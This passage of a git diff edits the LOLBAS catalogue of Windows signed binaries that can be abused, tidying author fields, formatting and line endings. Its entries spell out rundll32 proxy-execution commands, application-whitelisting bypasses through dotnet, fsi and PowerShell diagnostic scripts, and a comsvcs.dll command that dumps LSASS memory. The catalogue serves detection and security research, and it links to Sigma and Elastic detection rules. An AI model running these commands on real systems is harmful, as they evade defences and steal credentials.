HTML code. -Author: +Author: LOLBAS Team Created: '2018-05-25' Commands: - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. - UseCase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. + Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. Category: Execute Privileges: User MitreID: T1218.011 @@ -28,4 +28,3 @@ Acknowledgement: Handle: '@bohops' - Person: Adam Handle: '@hexacorn' ---- diff --git a/yml/OSLibraries/Mshtml.yml b/yml/OSLibraries/Mshtml.yml index 9483c3c..b3a777f 100644 --- a/yml/OSLibraries/Mshtml.yml +++ b/yml/OSLibraries/Mshtml.yml @@ -1,7 +1,7 @@ --- Name: Mshtml.dll Description: Microsoft HTML Viewer -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta" @@ -24,4 +24,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/yml/OSLibraries/Pcwutl.yml b/yml/OSLibraries/Pcwutl.yml index 1f47e38..3520e26 100644 --- a/yml/OSLibraries/Pcwutl.yml +++ b/yml/OSLibraries/Pcwutl.yml @@ -1,7 +1,7 @@ --- Name: Pcwutl.dll Description: Microsoft HTML Viewer -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Matt harr0ey Handle: '@harr0ey' ---- diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index 4295dd3..401c27b 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml @@ -1,19 +1,19 @@ --- Name: Setupapi.dll Description: Windows Setup Application Programming Interface -Author: +Author: LOLBAS Team Created: '2018-05-25' Commands: - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). - UseCase: Run local or remote script(let) code through INF file specification. + Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass Privileges: User MitreID: T1218.011 OperatingSystem: Windows - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. - UseCase: Load an executable payload. + Usecase: Load an executable payload. Category: Execute Privileges: User MitreID: T1218.011 @@ -43,4 +43,3 @@ Acknowledgement: Handle: '@subTee' - Person: Nick Carr (Threat Intel) Handle: '@ItsReallyNick' ---- diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index 8a8dccd..beaf96f 100644 --- a/yml/OSLibraries/Shdocvw.yml +++ b/yml/OSLibraries/Shdocvw.yml @@ -1,7 +1,7 @@ --- Name: Shdocvw.dll Description: Shell Doc Object and Control Library. -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" @@ -19,13 +19,12 @@ Code_Sample: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml Resources: - - Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ - - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ - - Link: https://twitter.com/bohops/status/997690405092290561 - - Link: https://windows10dll.nirsoft.net/shdocvw_dll.html + - Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ + - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ + - Link: https://twitter.com/bohops/status/997690405092290561 + - Link: https://windows10dll.nirsoft.net/shdocvw_dll.html Acknowledgement: - Person: Adam Handle: '@hexacorn' - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index 4ddf18e..302ded6 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml @@ -1,7 +1,7 @@ --- Name: Shell32.dll Description: Windows Shell Common Dll -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll @@ -17,12 +17,14 @@ Commands: Category: Execute Privileges: User MitreID: T1218.011 + OperatingSystem: Windows - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" Description: Launch command line by calling the ShellExec_RunDLL function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 + OperatingSystem: Windows Full_Path: - Path: c:\windows\system32\shell32.dll - Path: c:\windows\syswow64\shell32.dll @@ -46,4 +48,3 @@ Acknowledgement: Handle: '@mattifestation' - Person: Kyle Hanslovan (ShellExec_RunDLL) Handle: '@KyleHanslovan' ---- diff --git a/yml/OSLibraries/Syssetup.yml b/yml/OSLibraries/Syssetup.yml index 44a0bb4..a9792f2 100644 --- a/yml/OSLibraries/Syssetup.yml +++ b/yml/OSLibraries/Syssetup.yml @@ -1,7 +1,7 @@ --- Name: Syssetup.dll Description: Windows NT System Setup -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf @@ -40,4 +40,3 @@ Acknowledgement: Handle: '@harr0ey' - Person: Jimmy (Scriptlet) Handle: '@bohops' ---- diff --git a/yml/OSLibraries/Url.yml b/yml/OSLibraries/Url.yml index ea34df9..a1d0a80 100644 --- a/yml/OSLibraries/Url.yml +++ b/yml/OSLibraries/Url.yml @@ -1,7 +1,7 @@ --- Name: Url.dll Description: Internet Shortcut Shell Extension DLL. -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta" @@ -69,4 +69,3 @@ Acknowledgement: Handle: '@DissectMalware' - Person: r0lan (Obfuscation) Handle: '@r0lan' ---- diff --git a/yml/OSLibraries/Zipfldr.yml b/yml/OSLibraries/Zipfldr.yml index d64c755..0630f1c 100644 --- a/yml/OSLibraries/Zipfldr.yml +++ b/yml/OSLibraries/Zipfldr.yml @@ -1,7 +1,7 @@ --- Name: Zipfldr.dll Description: Compressed Folder library -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe @@ -34,4 +34,3 @@ Acknowledgement: Handle: '@moriarty_meng' - Person: r0lan (Obfuscation) Handle: '@r0lan' ---- diff --git a/yml/OSLibraries/comsvcs.yml b/yml/OSLibraries/comsvcs.yml index 03596cf..4eb5b2a 100644 --- a/yml/OSLibraries/comsvcs.yml +++ b/yml/OSLibraries/comsvcs.yml @@ -1,7 +1,7 @@ --- Name: Comsvcs.dll Description: COM+ Services -Author: +Author: LOLBAS Team Created: 2019-08-30 Commands: - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full" @@ -26,4 +26,3 @@ Resources: Acknowledgement: - Person: modexp Handle: ---- diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml index 638cea1..91b6b26 100644 --- a/yml/OSScripts/CL_LoadAssembly.yml +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -1,25 +1,24 @@ ---- -Name: CL_LoadAssembly.ps1 -Description: PowerShell Diagnostic Script -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: '”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()' - Description: Proxy execute Managed DLL with PowerShell - Usecase: Execute proxied payload with Microsoft signed binary - Category: Execute - Privileges: User - MitreID: T1216 - OperatingSystem: Windows 10 21H1 (likely other versions as well) -Full_Path: - - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 -Code_Sample: - - Code: -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/ff6c54ded6b52f379cec11fe17c1ccb956faa660/rules/windows/process_creation/proc_creation_win_lolbas_cl_loadassembly.yml -Resources: - - Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ -Acknowledgement: - - Person: Jimmy - Handle: '@bohops' ---- +--- +Name: CL_LoadAssembly.ps1 +Description: PowerShell Diagnostic Script +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: '”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()' + Description: Proxy execute Managed DLL with PowerShell + Usecase: Execute proxied payload with Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1216 + OperatingSystem: Windows 10 21H1 (likely other versions as well) +Full_Path: + - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 +Code_Sample: + - Code: +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/ff6c54ded6b52f379cec11fe17c1ccb956faa660/rules/windows/process_creation/proc_creation_win_lolbas_cl_loadassembly.yml +Resources: + - Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml index 08d6674..6aa4d87 100644 --- a/yml/OSScripts/CL_mutexverifiers.yml +++ b/yml/OSScripts/CL_mutexverifiers.yml @@ -1,6 +1,6 @@ --- Name: CL_Mutexverifiers.ps1 -Description: +Description: Proxy execution with CL_Mutexverifiers.ps1 Author: 'Oddvar Moe' Created: 2018-05-25 Commands: @@ -26,4 +26,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/yml/OSScripts/Cl_invocation.yml b/yml/OSScripts/Cl_invocation.yml index 6610eb1..8197863 100644 --- a/yml/OSScripts/Cl_invocation.yml +++ b/yml/OSScripts/Cl_invocation.yml @@ -28,4 +28,3 @@ Acknowledgement: Handle: '@bohops' - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/yml/OSScripts/Manage-bde.yml b/yml/OSScripts/Manage-bde.yml index edf125c..bab7431 100644 --- a/yml/OSScripts/Manage-bde.yml +++ b/yml/OSScripts/Manage-bde.yml @@ -36,4 +36,3 @@ Acknowledgement: Handle: '@danielbohannon' - Person: John Lambert Handle: '@JohnLaTwC' ---- diff --git a/yml/OSScripts/Pubprn.yml b/yml/OSScripts/Pubprn.yml index b95813a..3972a02 100644 --- a/yml/OSScripts/Pubprn.yml +++ b/yml/OSScripts/Pubprn.yml @@ -1,6 +1,6 @@ --- Name: Pubprn.vbs -Description: +Description: Proxy execution with Pubprn.vbs Author: 'Oddvar Moe' Created: 2018-05-25 Commands: @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Matt Nelson Handle: '@enigma0x3' ---- diff --git a/yml/OSScripts/Syncappvpublishingserver.yml b/yml/OSScripts/Syncappvpublishingserver.yml index fb6aa06..f9e3dd4 100644 --- a/yml/OSScripts/Syncappvpublishingserver.yml +++ b/yml/OSScripts/Syncappvpublishingserver.yml @@ -25,4 +25,3 @@ Acknowledgement: Handle: '@monoxgas' - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml index b4908a6..800938c 100644 --- a/yml/OSScripts/UtilityFunctions.yml +++ b/yml/OSScripts/UtilityFunctions.yml @@ -1,25 +1,24 @@ ---- -Name: UtilityFunctions.ps1 -Description: PowerShell Diagnostic Script -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: 'powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()”' - Description: Proxy execute Managed DLL with PowerShell - Usecase: Execute proxied payload with Microsoft signed binary - Category: Execute - Privileges: User - MitreID: T1216 - OperatingSystem: Windows 10 21H1 (likely other versions as well) -Full_Path: - - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 -Code_Sample: - - Code: -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/0.21-688-gd172b136b/rules/windows/process_creation/proc_creation_win_lolbas_utilityfunctions.yml -Resources: - - Link: https://twitter.com/nickvangilder/status/1441003666274668546 -Acknowledgement: - - Person: Nick VanGilder - Handle: '@nickvangilder' ---- +--- +Name: UtilityFunctions.ps1 +Description: PowerShell Diagnostic Script +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: 'powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()”' + Description: Proxy execute Managed DLL with PowerShell + Usecase: Execute proxied payload with Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1216 + OperatingSystem: Windows 10 21H1 (likely other versions as well) +Full_Path: + - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 +Code_Sample: + - Code: +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/0.21-688-gd172b136b/rules/windows/process_creation/proc_creation_win_lolbas_utilityfunctions.yml +Resources: + - Link: https://twitter.com/nickvangilder/status/1441003666274668546 +Acknowledgement: + - Person: Nick VanGilder + Handle: '@nickvangilder' diff --git a/yml/OSScripts/Winrm.yml b/yml/OSScripts/Winrm.yml index 67a1719..cdd4176 100644 --- a/yml/OSScripts/Winrm.yml +++ b/yml/OSScripts/Winrm.yml @@ -55,4 +55,3 @@ Acknowledgement: Handle: '@bohops' - Person: Red Canary Company cc Tony Lambert Handle: '@redcanaryco' ---- diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml index bc19377..78e24e0 100644 --- a/yml/OSScripts/pester.yml +++ b/yml/OSScripts/pester.yml @@ -33,5 +33,4 @@ Acknowledgement: - Person: Emin Atac Handle: '@p0w3rsh3ll' - Person: Stamatis Chatzimangou - Handle: '@_st0pp3r_' ---- + Handle: '@_st0pp3r_' diff --git a/yml/OtherMSBinaries/AccCheckConsole.yml b/yml/OtherMSBinaries/AccCheckConsole.yml index 6c21705..8c07903 100644 --- a/yml/OtherMSBinaries/AccCheckConsole.yml +++ b/yml/OtherMSBinaries/AccCheckConsole.yml @@ -34,4 +34,3 @@ Resources: Acknowledgement: - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OtherMSBinaries/Adplus.yml b/yml/OtherMSBinaries/Adplus.yml index da7749d..0cd6d62 100644 --- a/yml/OtherMSBinaries/Adplus.yml +++ b/yml/OtherMSBinaries/Adplus.yml @@ -23,4 +23,3 @@ Resources: Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' ---- diff --git a/yml/OtherMSBinaries/Agentexecutor.yml b/yml/OtherMSBinaries/Agentexecutor.yml index e082f2c..1af9f88 100644 --- a/yml/OtherMSBinaries/Agentexecutor.yml +++ b/yml/OtherMSBinaries/Agentexecutor.yml @@ -28,4 +28,3 @@ Resources: Acknowledgement: - Person: Eleftherios Panos Handle: '@lefterispan' ---- diff --git a/yml/OtherMSBinaries/Appvlp.yml b/yml/OtherMSBinaries/Appvlp.yml index d8fdf6b..ad91b5f 100644 --- a/yml/OtherMSBinaries/Appvlp.yml +++ b/yml/OtherMSBinaries/Appvlp.yml @@ -44,4 +44,3 @@ Acknowledgement: Handle: '@moo_hax' - Person: Matt Wilson Handle: '@enigma0x3' ---- diff --git a/yml/OtherMSBinaries/Bginfo.yml b/yml/OtherMSBinaries/Bginfo.yml index 78d64cf..0d94ccf 100644 --- a/yml/OtherMSBinaries/Bginfo.yml +++ b/yml/OtherMSBinaries/Bginfo.yml @@ -60,4 +60,3 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index 8e82023..db3adea 100644 --- a/yml/OtherMSBinaries/Cdb.yml +++ b/yml/OtherMSBinaries/Cdb.yml @@ -42,4 +42,3 @@ Acknowledgement: Handle: '@mrd0x' - Person: Spooky Sec Handle: '@sec_spooky' ---- diff --git a/yml/OtherMSBinaries/Coregen.yml b/yml/OtherMSBinaries/Coregen.yml index 7026e44..d92d2dc 100644 --- a/yml/OtherMSBinaries/Coregen.yml +++ b/yml/OtherMSBinaries/Coregen.yml @@ -46,4 +46,3 @@ Acknowledgement: Handle: - Person: Casey Erikson Handle: ---- diff --git a/yml/OtherMSBinaries/Csi.yml b/yml/OtherMSBinaries/Csi.yml index 7634065..abd9565 100644 --- a/yml/OtherMSBinaries/Csi.yml +++ b/yml/OtherMSBinaries/Csi.yml @@ -28,4 +28,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OtherMSBinaries/DefaultPack.yml b/yml/OtherMSBinaries/DefaultPack.yml index a1c22cc..dc4eab5 100644 --- a/yml/OtherMSBinaries/DefaultPack.yml +++ b/yml/OtherMSBinaries/DefaultPack.yml @@ -22,4 +22,3 @@ Resources: Acknowledgement: - Person: checkymander Handle: '@checkymander' ---- diff --git a/yml/OtherMSBinaries/Devtoolslauncher.yml b/yml/OtherMSBinaries/Devtoolslauncher.yml index dede1aa..00b82ac 100644 --- a/yml/OtherMSBinaries/Devtoolslauncher.yml +++ b/yml/OtherMSBinaries/Devtoolslauncher.yml @@ -30,4 +30,3 @@ Resources: Acknowledgement: - Person: felamos Handle: '@_felamos' ---- diff --git a/yml/OtherMSBinaries/Dnx.yml b/yml/OtherMSBinaries/Dnx.yml index ba2d22a..7957ca2 100644 --- a/yml/OtherMSBinaries/Dnx.yml +++ b/yml/OtherMSBinaries/Dnx.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Matt Nelson Handle: '@enigma0x3' ---- diff --git a/yml/OtherMSBinaries/Dotnet.yml b/yml/OtherMSBinaries/Dotnet.yml index 2490174..b202817 100644 --- a/yml/OtherMSBinaries/Dotnet.yml +++ b/yml/OtherMSBinaries/Dotnet.yml @@ -6,6 +6,7 @@ Created: 2019-11-12 Commands: - Command: dotnet.exe [PATH_TO_DLL] Description: dotnet.exe will execute any dll even if applocker is enabled. + Usecase: Execute code bypassing AWL Category: AWL Bypass Privileges: User MitreID: T1218 @@ -19,6 +20,7 @@ Commands: OperatingSystem: Windows 7 and up with .NET installed - Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ] Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code + Usecase: Execute code bypassing AWL Category: AWL Bypass Privileges: User MitreID: T1218 @@ -38,4 +40,3 @@ Acknowledgement: Handle: '@_felamos' - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OtherMSBinaries/Dump64.yml b/yml/OtherMSBinaries/Dump64.yml index 4adb7c9..e4d1c6d 100644 --- a/yml/OtherMSBinaries/Dump64.yml +++ b/yml/OtherMSBinaries/Dump64.yml @@ -21,4 +21,3 @@ Resources: Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' ---- diff --git a/yml/OtherMSBinaries/Dxcap.yml b/yml/OtherMSBinaries/Dxcap.yml index 6cc8b9d..cf5b56f 100644 --- a/yml/OtherMSBinaries/Dxcap.yml +++ b/yml/OtherMSBinaries/Dxcap.yml @@ -23,4 +23,3 @@ Resources: Acknowledgement: - Person: Matt harr0ey Handle: '@harr0ey' ---- diff --git a/yml/OtherMSBinaries/Excel.yml b/yml/OtherMSBinaries/Excel.yml index a12816b..0dc1354 100644 --- a/yml/OtherMSBinaries/Excel.yml +++ b/yml/OtherMSBinaries/Excel.yml @@ -38,4 +38,3 @@ Resources: Acknowledgement: - Person: 'Reegun J (OCBC Bank)' Handle: '@reegun21' ---- diff --git a/yml/OtherMSBinaries/Fsi.yml b/yml/OtherMSBinaries/Fsi.yml index 2adf80a..fe18464 100644 --- a/yml/OtherMSBinaries/Fsi.yml +++ b/yml/OtherMSBinaries/Fsi.yml @@ -1,39 +1,38 @@ ---- -Name: Fsi.exe -Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK. -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: fsi.exe c:\path\to\test.fsscript - Description: Execute F# code via script file - Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1059 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) - - Command: fsi.exe - Description: Execute F# code via interactive command line - Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1059 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) -Full_Path: - - Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe - - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe -Code_Sample: - - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 -Detection: - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: Fsi.exe execution may be suspicious on non-developer machines -Resources: - - Link: https://twitter.com/NickTyrer/status/904273264385589248 - - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ -Acknowledgement: - - Person: Nick Tyrer - Handle: '@NickTyrer' - - Person: Jimmy - Handle: '@bohops' ---- +--- +Name: Fsi.exe +Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: fsi.exe c:\path\to\test.fsscript + Description: Execute F# code via script file + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + - Command: fsi.exe + Description: Execute F# code via interactive command line + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe + - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe +Code_Sample: + - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 +Detection: + - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml + - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - IOC: Fsi.exe execution may be suspicious on non-developer machines +Resources: + - Link: https://twitter.com/NickTyrer/status/904273264385589248 + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Nick Tyrer + Handle: '@NickTyrer' + - Person: Jimmy + Handle: '@bohops' diff --git a/yml/OtherMSBinaries/FsiAnyCpu.yml b/yml/OtherMSBinaries/FsiAnyCpu.yml index 54e1cf5..0a81660 100644 --- a/yml/OtherMSBinaries/FsiAnyCpu.yml +++ b/yml/OtherMSBinaries/FsiAnyCpu.yml @@ -1,35 +1,34 @@ ---- -Name: FsiAnyCpu.exe -Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio. -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: fsianycpu.exe c:\path\to\test.fsscript - Description: Execute F# code via script file - Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1059 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) - - Command: fsianycpu.exe - Description: Execute F# code via interactive command line - Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1059 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) -Full_Path: - - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe -Code_Sample: - - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 -Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines -Resources: - - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ -Acknowledgement: - - Person: Nick Tyrer - Handle: '@NickTyrer' - - Person: Jimmy - Handle: '@bohops' ---- +--- +Name: FsiAnyCpu.exe +Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: fsianycpu.exe c:\path\to\test.fsscript + Description: Execute F# code via script file + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + - Command: fsianycpu.exe + Description: Execute F# code via interactive command line + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe +Code_Sample: + - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 +Detection: + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines +Resources: + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Nick Tyrer + Handle: '@NickTyrer' + - Person: Jimmy + Handle: '@bohops' diff --git a/yml/OtherMSBinaries/Mftrace.yml b/yml/OtherMSBinaries/Mftrace.yml index 6a98a92..93c0440 100644 --- a/yml/OtherMSBinaries/Mftrace.yml +++ b/yml/OtherMSBinaries/Mftrace.yml @@ -31,4 +31,3 @@ Resources: Acknowledgement: - Person: fabrizio Handle: '@0rbz_' ---- diff --git a/yml/OtherMSBinaries/Msdeploy.yml b/yml/OtherMSBinaries/Msdeploy.yml index 234878a..eefd3ab 100644 --- a/yml/OtherMSBinaries/Msdeploy.yml +++ b/yml/OtherMSBinaries/Msdeploy.yml @@ -14,7 +14,7 @@ Commands: - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat" Description: Launch calc.bat via msdeploy.exe. Usecase: Local execution of batch file using msdeploy.exe. - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows server @@ -30,4 +30,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/yml/OtherMSBinaries/Msxsl.yml b/yml/OtherMSBinaries/Msxsl.yml index 1fae912..b7a2cb3 100644 --- a/yml/OtherMSBinaries/Msxsl.yml +++ b/yml/OtherMSBinaries/Msxsl.yml @@ -33,7 +33,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Full_Path: - - Path: + - Path: no default Code_Sample: - Code: Detection: @@ -47,4 +47,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OtherMSBinaries/Ntdsutil.yml b/yml/OtherMSBinaries/Ntdsutil.yml index dc6bfe4..d9db99f 100644 --- a/yml/OtherMSBinaries/Ntdsutil.yml +++ b/yml/OtherMSBinaries/Ntdsutil.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Sean Metcalf Handle: '@PyroTek3' ---- diff --git a/yml/OtherMSBinaries/Powerpnt.yml b/yml/OtherMSBinaries/Powerpnt.yml index 2e72a56..28baf81 100644 --- a/yml/OtherMSBinaries/Powerpnt.yml +++ b/yml/OtherMSBinaries/Powerpnt.yml @@ -35,4 +35,3 @@ Resources: Acknowledgement: - Person: Reegun J (OCBC Bank) Handle: '@reegun21' ---- diff --git a/yml/OtherMSBinaries/Procdump.yml b/yml/OtherMSBinaries/Procdump.yml index 65cbb04..7e8d513 100644 --- a/yml/OtherMSBinaries/Procdump.yml +++ b/yml/OtherMSBinaries/Procdump.yml @@ -1,34 +1,35 @@ ---- -Name: Procdump(64).exe -Description: SysInternals Memory Dump Tool -Author: 